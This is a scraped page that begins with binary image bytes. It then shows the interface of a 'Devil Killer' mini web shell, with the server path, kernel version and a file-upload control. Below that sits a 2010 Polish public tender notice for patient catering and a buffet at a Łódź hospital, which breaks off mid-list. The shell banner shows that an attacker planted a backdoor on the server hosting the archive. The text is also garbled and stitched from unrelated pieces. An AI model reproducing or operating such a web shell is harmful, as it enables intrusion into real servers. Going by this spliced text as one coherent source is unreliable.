JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101112/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101112/321249-N-2010.html

<p class="kh_header"><b>Łódź: Świadczenie usług w zakresie całodziennego żywienia  pacjentów w systemie  cateringowym  wraz z prowadzeniem bufetu dla Wojewódzkiego Specjalistycznego Szpitala im. M. Madurowicza w Łodzi ZP/51/2010</b><br>
<b>Numer ogłoszenia: 321249 - 2010; data zamieszczenia: 12.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Specjalistyczny Szpital im. M. Madurowicza , ul. Wileńska 37, 94-029 Łódź, woj. łódzkie, tel. 042 6879997, faks 042 6879997.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie całodziennego żywienia  pacjentów w systemie  cateringowym  wraz z prowadzeniem bufetu dla Wojewódzkiego Specjalistycznego Szpitala im. M. Madurowicza w Łodzi ZP/51/2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia
1.	Przedmiotem zamówienia jest świadczenie usług przygotowywania i dostarczania na poszczególne oddziały poporcjowanych posiłków dla pacjentów Szpitala im. M. Madurowicza w Łodzi przy ul. Wileńskiej 37 w opakowaniach jednorazowych wraz z prowadzeniem bufetu szpitalnego w wyznaczonym do tego celu miejscu na terenie siedziby Zamawiającego.
2.	Zamawiający powierza Wykonawcy sporządzanie posiłków z artykułów spożywczych zakupionych we własnym zakresie z uwzględnieniem zaleceń dietetycznych oraz ich dystrybucją na poszczególne oddziały szpitalne.
3.	Wykonawca zapewni ciągłość żywienia przez 7 dni w tygodniu.
4.	Zamawiający szacuje średnią roczną ilość posiłków na poziomie
     liczba śniadań 72.000
     liczba obiadów 74.000
     liczba kolacji 68.000
5.	Podstawowym założeniem są  trzy posiłki dziennie dla pacjenta. Ilość zamawianych posiłków  dziennie uzależniona będzie od ilości pacjentów.
6.	Zestawy określone w pkt. 4 muszą zawierać zróżnicowane menu. śniadanie powinno zawierać zupę mleczną lub kawę mleczną oraz posiłek  podstawowy,                      
obiad powinien zawierać zupę i drugie danie z surówką, 
 kolacja posiłek podstawowy oraz herbata 
 odpowiednie napoje do posiłków np. kawa mleczna, herbata, kompot itp. 
7.	W sporządzaniu posiłków należy uwzględnić powszechnie stosowane diety w szpitalach np.
w diecie cukrzycowej  6 posiłków , dodatkowo II śniadanie, podwieczorek i posiłek nocny
w diecie bogato białkowej 5 posiłków  ,dodatkowo II śniadanie, podwieczorek  w diecie wrzodowej  4 posiłki , dodatkowo  II śniadanie.
8.	W zakres przedmiotu zamówienia wchodzi również dostarczanie posiłków profilaktycznych dla pracowników zatrudnionych w sterylizacji  oraz posiłków regeneracyjnych w okresie zimowym  tj. od 1 XI do 31.III dla określonej grupy pracowników średnio w ilości 9 - 10 posiłków dziennie od poniedziałku do piątku oraz 1 posiłek w soboty, niedziele i dni świąteczne, posiadających odpowiednią kaloryczność i wartość odżywczą określoną odpowiednimi normami i przepisami. Zamawiający określa, iż cena jednostkowa posiłku regeneracyjnego i posiłku profilaktycznego  nie może przekroczyć całkowitej kwoty netto 4,00 zł za posiłek.
 liczba posiłków regeneracyjnych  800
 liczba posiłków profilaktycznych 320
9.	W ramach zawartej umowy Wykonawca na własny koszt zobowiązany będzie do wyposażenia oddziałów szpitalnych tak, aby zapewnić  na potrzeby pacjentów wrzątek w ilości nie mniejszej niż 1000 ml dziennie na jednego pacjenta
10.	Wykonawca zabezpiecza we własnym zakresie termosy oraz pozostały sprzęt niezbędny do wykonania zamówienia   np. dzbanki do płynów.
11.	Obowiązkiem Wykonawcy na własny koszt będzie usuwanie i utylizacja wszystkich odpadów pokonsumpcyjnych.
12.	Wykonawca zobowiązany jest ponadto do prowadzenia odpłatnego bufetu szpitalnego dla pacjentów, osób odwiedzających oraz personelu Szpitala w wyznaczonym do tego celu miejscu na terenie siedziby zamawiającego, wydawania w nim posiłków w tym obiadów dla pracowników Zamawiającego.
13.	Wykonawca zobowiązany jest prowadzić ewidencję wydawanych posiłków z podziałem na oddziały, potwierdzoną każdorazowo przez osobę odpowiedzialną ze strony Zamawiającego.
14.	Podstawą  do ewidencji dostaw będą dokumenty dostawy potwierdzone przez Zamawiającego. Rozliczenie będzie następowało na podstawie dokumentów potwierdzających ilość wydanych poszczególnych posiłków.
15.	Wykonawca na koniec każdego  miesiąca na podstawie ewidencji dostaw  wystawi  fakturę VAT zawierającą ilość wydanych poszczególnych posiłków, cenę  jednostkową oraz termin płatności. 
16.	Zamawiający zastrzega sobie możliwość niewykorzystania przedmiotu zamówienia nie więcej niż 20% wartości umowy.
WYMAGANIA ODNOŚNIE PRZEDMIOTU ZAMÓWIENIA: 
A. Wymagania ogólne 
1.	Świadczenie usług żywienia dla pacjentów szpitala odbywać powinno się wg ustawy z 25 sierpnia 2006r.  o bezpieczeństwie żywności i żywienia  tekst jednolity Dz. U nr 136 z 2010r. poz. 914 
2.	Racje pokarmowe, ich wartość kaloryczną i zawartość składników odżywczych określa wykaz norm dziennych racji pokarmowych dla zakładów opieki zdrowotnej opracowany przez Instytut Żywności i Żywienia w Warszawie.
3.	Wykonawca świadczący usługę ponosi pełną odpowiedzialność cywilną i finansową za jakość przygotowywanych                        i dostarczanych posiłków oraz za skutki wynikające z zaniedbań przy przygotowywaniu, transporcie posiłków, mogące mieć wpływ na zdrowie żywionych pacjentów.
4.	Wykonawca zobowiązany będzie do przestrzegania procedur higienicznych dotyczących higieny rąk, środków transportu, urządzeń i sprzętu oraz stosowania preparatów myjących i dezynfekujących  dopuszczonych do stosowania w kontakcie z żywnością.
5.	Wykonawca ponosić będzie odpowiedzialność prawną i materialną wobec organów kontroli Stacja Sanitarno - Epidemiologiczna, PIP, BHP itp. oraz w zakresie wykonywanej usługi w tym m.in. w zakresie jakości produktów                    i przygotowywanych posiłków, ich zgodności z odpowiednimi normami kalorii oraz w zakresie wymagań higieniczno-sanitarnych.
6.	Wykonawca ponosić będzie odpowiedzialność odszkodowawczą za szkody powstałe u Zamawiającego w związku                  z prowadzoną przez Wykonawcę działalnością, m.in. udowodnione zatrucia pokarmowe.
B. Wymagania dotyczące  dostarczania posiłków.
1.	Wykonawca zobowiązany będzie do dostarczania  posiłków do  oddziałów znajdujących się  w budynku Ginekologii oraz Interny w godzinach:
 śniadania 8:00 - 8:30obiady 12:30 - 13:00 kolacje 17:30 - 18:00
Drugie śniadanie winno być dostarczone na oddziały razem ze śniadaniem, podwieczorek razem z obiadem, posiłek  nocny  razem z kolacją. Podanie w/w posiłków pacjentom należeć będzie do obowiązków personelu szpitalnego danego oddziału.
2.	W przypadku braku dostarczonego posiłku na oddział Zamawiający zobowiązuje Wykonawcę do natychmiastowego dostarczenia i uzupełnienia braków.
3.	Dostarczane posiłki muszą być gorące, poza posiłkami, które co do zasady są spożywane na zimno.
4.	Wykonawca we własnym zakresie w ramach zawartej umowy zobowiązany jest zabezpieczyć wszystkie oddziały                  w kuchenki mikrofalowe w celu ewentualnego podgrzewania posiłków.
5.	Pojemniki jednorazowe używane przy dostawach posiłków muszą być dopuszczone do używania w żywieniu zbiorowym oraz nadawać się do odgrzewania posiłku w kuchence mikrofalowej.
6.	Dostarczanie posiłków winno odbywać się w przeznaczonych do tego celu pojemnikach termosach zabezpieczających posiłki przed wylaniem lub schłodzeniem, oraz spełniających wymogi sanitarno epidemiologiczne. 
7.	Wykonawca zapewnia własny transport posiłków na oddziały. Dystrybucja posiłków do oddziałów szpitalnych winna odbywać się w sposób gwarantujący przestrzeganie norm higienicznych pojemniki transportowe szczelnie zamykane oraz utrzymanie ich właściwej temperatury termosy.
8.	Pojemniki jednorazowe muszą być transportowane w zamkniętych kontenerach.
9.	Wykonawca świadczący usługę żywienia pacjentów zobowiązany jest do przygotowywania i dostarczania posiłków zgodnie z obowiązującymi w tym zakresie zasadami, warunkami i normami dla placówek ochrony zdrowia,                           z uwzględnieniem tradycyjnej kuchni polskiej.
10.	Do obowiązków Wykonawcy należy zaopatrzenie chorych leżących w szpitalu w odpowiednie napoje do posiłków np. kawa mleczna, herbata, kompot itp. 
11.	Wykonawca zabezpiecza we własnym zakresie termosy oraz pozostały sprzęt np. dzbanki do płynów - sprzęt ten musi być myty i dezynfekowany przez Wykonawcę w siedzibie firmy.  Wykonawca zabezpiecza też na własny koszt odzież i obuwie ochronne niezbędne do dystrybucji posiłków na oddziały.
12.	Wykonawca zabezpiecza we własnym zakresie sztućce jednorazowe i kubki jednorazowe.
13.	Przygotowanie posiłków przez Wykonawcę odbywać się będzie z uwzględnieniem dziennych racji pokarmowych, wartości kalorycznych, zawartości składników odżywczych określonych przez Instytut Żywności i Żywienia                         z uwzględnieniem wprowadzonych obowiązujących zmian w okresie trwania umowy. 
14.	Wykonawca przy sporządzaniu jadłospisów uwzględniać będzie sezonowość dostępnych na rynku świeżych produktów tj.: kalafior, brokuły, fasolka szparagowa, itp. 
15.	Żywienie chorych musi być oparte na dietach takich jak: ogólna, lekkostrawna, cukrzycowa, trzustkowa, bezglutenowa, niskotłuszczowa, płynna, zmiksowana, bogato białkowa, wrzodowa, bezmięsna, kleik i suchary. Dopuszcza się możliwość zamawiania diet nie wymienionych powyżej, w przypadku innych zaleceń lekarzy Szpitala.
Przewidywana ilość diet cukrzycowych około 30 dziennie i około 5 - 10 diet kleik i suchary.
16.	Kaloryczność poszczególnych posiłków musi być dostosowana do poszczególnych diet przez dietetyka Wykonawcy                      i musi odpowiadać stosownym normom dla poszczególnych rodzajów diet.
17.	Posiłki dla pracowników Szpitala sporządza się wg diety ogólnej.
18.	Nad technologią sporządzania posiłków sprawuje nadzór dietetyk Wykonawcy.
19.	Posiłki muszą być dostarczane do oddziałów  przez kompetentne i upoważnione przez Wykonawcę osoby.
20.	Wykonawca zobowiązuje się do pobierania i przechowywania próbek żywności z dostarczonych posiłków. 
21.	Po zakończeniu posiłku Wykonawca odbierze z oddziału zużyte opakowania jednorazowe wraz z odpadami pokonsumpcyjnymi.
22.	Wykonawca zobowiązany będzie do dostarczenia worków na odpady pokonsumpcyjne na poszczególne oddziały.
23.	Wykonawca codziennie zobowiązany będzie do odbioru odpadów pokonsumpcyjnych w odpowiednich pojemnikach zgodnie z zaleceniami Stacji Sanitarno Epidemiologicznej  w celu utylizacji zgodnie z obowiązującymi przepisami. 
24.	Obowiązkiem Wykonawcy będzie usuwanie i utylizacja wszystkich odpadów pokonsumpcyjnych należących do Wykonawcy a także mycie pojemników i urządzeń transportowych. Odbiór odpadów będzie następował bezpośrednio po spożytym posiłku, zgodnie z obowiązującymi przepisami oraz zaleceniami odpowiednich służb sanitarnych.
25.	Wykonawca jest zobowiązany do utrzymania w należytej czystości miejsca składowania resztek pokonsumpcyjnych                i terenu przyległego.
26.	Wykonawca dla każdego oddziału jest zobowiązany zapewnić odpowiednie pojemniki do przechowywania posiłków pozostawionych dla pacjentów przebywających na badaniach oraz możliwość podgrzania tych posiłków np. mikrofalówki.
27.	Wszyscy pracownicy Wykonawcy realizujący usługę muszą posiadać aktualne książeczki zdrowia dla celów epidemiologicznych, dostępne w każdej chwili dla Zamawiającego. Personel przygotowujący, rozdzielający oraz transportujący posiłki musi posiadać aktualne badania lekarskie do celów sanitarno epidemiologicznych oraz badania okresowe.
28.	Personel Wykonawcy zajmujący się dystrybucją posiłków na oddziały szpitalne musi być wyposażony w odzież ochronną dostosowaną do wymogów sanitarno epidemiologicznych.
C. Wymagania dotyczące  zamawiania  posiłków:
1.	Zamówienia na posiłki będą przygotowywane pisemnie przez odpowiednich pracowników Zamawiającego. Pracownik Wykonawcy będzie zbierał zamówienia liczba  i asortyment posiłków każdego dnia dotyczy również sobót, niedziel i dni świątecznych z poszczególnych oddziałów.
do godz. 7:00  odbiór zamówienia z poszczególnych oddziałów na śniadania i obiady w danym dniu;
do godz. 14:00  odbiór zamówienia z poszczególnych oddziałów na kolacje w danym dniu
2.	Zamawiający ma prawo dokonać korekty ilości zamawianych posiłków zarówno in plus jak i in minus, najpóźniej
do godz. 11:00 na obiady w danym dniu,
  do godz. 16:30 na kolacje w danym dniu.
Korekty będą składane w każdym dniu tygodnia dotyczy również sobót, niedziel i dni świątecznych. Korekta będzie dokonywana telefonicznie przez pracownika Zamawiającego z pisemnym potwierdzeniem zgłoszenia, odebranym przez przedstawicieli Wykonawcy przy następnym zamówieniu.
3.	Zamówienia i korekty składane będą u osoby upoważnionej do kontaktu wraz z pisemnym potwierdzeniem.
4.	Do Wykonawcy należeć będzie opracowanie i dostarczenie na poszczególne oddziały druków zamówień na posiłki                  i dostarczenie opracowanego przez Wykonawcę wykazu nazewnictwa diet.
5.	Wskazana przez Wykonawcę osoba do kontaktu będzie zobowiązana do konsultacji w sprawie przygotowywania menu oraz zgłaszania uwag w sprawie realizacji umowy, przyjmowania reklamacji, a w szczególności  awarii oraz do spotkań z Pielęgniarkami Oddziałowymi.
6.	Rozliczenie będzie następowało na podstawie dokumentów potwierdzających ilość wydanych poszczególnych posiłków.
7.	W trakcie realizacji usługi Wykonawca zobowiązany będzie do przygotowania i przedstawienia do akceptacji dietetyka szpitalnego, z wyprzedzeniem czasowym 3 dni roboczych, dekadowego jadłospisu posiłków                                  z uwzględnieniem racji pokarmowych, wartości odżywczych dla poszczególnych diet, w oparciu o odpowiednie przepisy dotyczące całodziennego żywienia określonych grup żywieniowych chorych oraz do przedłożenia pracownikom oddziału codziennie rano jadłospisu na bieżący dzień potwierdzającego zaakceptowany wcześniej jadłospis dekadowy.
8.	W przypadku zlecenia diety specjalnej niezawartej w jadłospisie dekadowym Zamawiający zobowiązuje Wykonawcę do dostarczenia każdorazowo jadłospisu zawierającego szczegółowy skład potraw, kaloryczność                       i zawartość składników odżywczych. 
9.	Jadłospisy muszą być sporządzane przez firmę dostarczającą posiłki uwzględniając sezonowość oraz tradycyjność potraw również w okresie świąt, np. Bożego Narodzenia czy Wielkanocy.
10.	Wykonawca zobowiązany jest prowadzić ewidencję wydawanych posiłków z podziałem na oddziały, potwierdzoną każdorazowo przez osobę odpowiedzialną ze strony Zamawiającego.
D.  Prawa Zamawiającego:
1.	Zamawiający ma prawo do przeprowadzenia oceny organoleptycznej oferowanych posiłków, sprawdzenia ich gramatury oraz zgodności sporządzanych potraw z zaplanowanym jadłospisem. Gramatura podanego posiłku ma być zgodna z wagą podaną w jadłospisie (gramatura podawana po obróbce termicznej). Zakwestionowane posiłki podlegać będą zwrotowi i wymianie na koszt Wykonawcy.
2.	Zamawiający zastrzega sobie prawo pobrania wymazów w kierunku czystości mikrobiologicznej ze sprzętu                               i dzierżawionych pomieszczeń. Pobranie wymazów będzie się odbywało na koszt Wykonawcy.
3.	Zamawiający, a w szczególności Zespół ds. Zakażeń Zakładowych co najmniej raz w miesiącu skontroluje sprzęt Wykonawcy, w którym będą dostarczane posiłki.
4.	Zamawiający zastrzega sobie prawo wizytacji miejsc na koszt Wykonawcy przygotowywania  i pakowania posiłków oraz możliwość sprawdzenia sposobu przygotowywania posiłków przez upoważnione przez siebie i posiadające specjalne uprawnienia osoby.
5.	Stosowane przez Wykonawcę środki dezynfekcyjne i detergenty będą podlegały zaakceptowaniu przez Zespół ds. Zakażeń Zakładowych, ponadto muszą być dopuszczone do powierzchni mających kontakt z żywnością i posiadać wpis do ewidencji stosowania w jednostkach ochrony zdrowia.
6.	W przypadku zagrożenia epidemiologicznego Zamawiający zastrzega możliwość zmiany środka dezynfekcyjnego.
E. Warunki dzierżawy pomieszczeń.
1.	Zamawiający, w celu realizacji usługi wydzierżawi Wykonawcy pomieszczenia niezbędne do prowadzenia bufetu                  o powierzchni 92,67 m2.
2.	Sposób rozliczania za dzierżawione pomieszczenia: 
-	czynsz                                                             netto - 30  zł m2
-	woda ciepła i zimna, energia elektryczna - według odczytu z licznika;
-	ścieki - suma odczytów z liczników wody ciepłej i zimnej
-	telefon - według faktury
-	ogrzewanie c. o.                                                netto 150 zł  m-c 
-	podatek od nieruchomości                               netto 1,67 zł  m2
-	ubezpieczenie                                                    netto  2,37 zł m2
-	ochrona                                                              netto  1,95 zł m2
-	wywóz nieczystości                                           netto  1,50 zł m2
-	dezynfekcja, dezynsekcja, deratyzacja             netto  100zł m-c 
-	konserwacja windy                                           netto  200 zł  m-c 
3.	Wykonawca ma obowiązek udostępnić Zamawiającemu dzierżawione pomieszczenia celem przeprowadzenia dezynsekcji i deratyzacji.
4.	Na Wykonawcy spoczywa obowiązek powiadomienia Zamawiającego o konieczności przeprowadzenia dodatkowej dezynsekcji i deratyzacji. Koszt dezynsekcji i deratyzacji poniesie Zamawiający i obciąży nim Wykonawcę..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.89.42.20-9, 55.32.10.00-6, 55.32.20.00-3, 55.52.12.00-0, 55.52.00.00-1, 55.51.20.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w tym zakresie Wykonawca musi posiadać. 
decyzję - zezwolenie wydaną przez właściwy Państwowy Inspektorat Sanitarny potwierdzającą spełnienie wymagań koniecznych do prowadzenia zakładu żywienia zbiorowego z uwzględnieniem żywienia pacjentów szpitala, (przygotowanie posiłków oraz usługa cateringowa/dystrybucja).opinię - zezwolenie wydaną przez właściwy Państwowy Inspektorat Sanitarny dotyczącą spełnienia wymogów sanitarnych koniecznych przy przewozie posiłków,
Certyfikat HACCP</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykonał lub wykonywał w okresie ostatnich 3 lat przed upływem terminu składania ofert minimum trzy  usługi  trwające  minimum rok polegające na żywieniu zbiorowym  pacjentów szpitala z zastosowaniem diet o wartości  nie mniej niż  150.000,00 zł brutto rocznie każda z usług.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada  przynajmniej dwie placówki ( kuchnie ) do przygotowania posiłków  z czego przynajmniej jedna zdolna jest  do wykonania minimum 300  posiłków całodobowych ( czyli śniadań, obiadów, kolacji)  dziennie. 
Wykonawca dysponuje  minimum 3 środkami transportu wykorzystywanymi w celu realizacji zamówienia, posiadającymi odpowiednie zaświadczenie stwierdzające spełnianie wymagań sanitarnych dotyczących transportu posiłków wydane przez właściwego Państwowego Powiatowego Inspektora Sanitarnego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje  niezbędnym do wykonania usługi potencjałem kadrowym osób odpowiedzialnych za nadzór nad właściwą realizacją umowy w zakresie żywienia w szczególności posiada minimum 2 dietetyków, minimum 2 technologów, szefa lub kierownika kuchni posiadających minimum 5 letnie doświadczenie zawodowe na tym stanowisku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  posiada ubezpieczenie OC w zakresie prowadzonej działalności gospodarczej o wartości min. 2.000.000 zł, obejmującą usługi żywienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

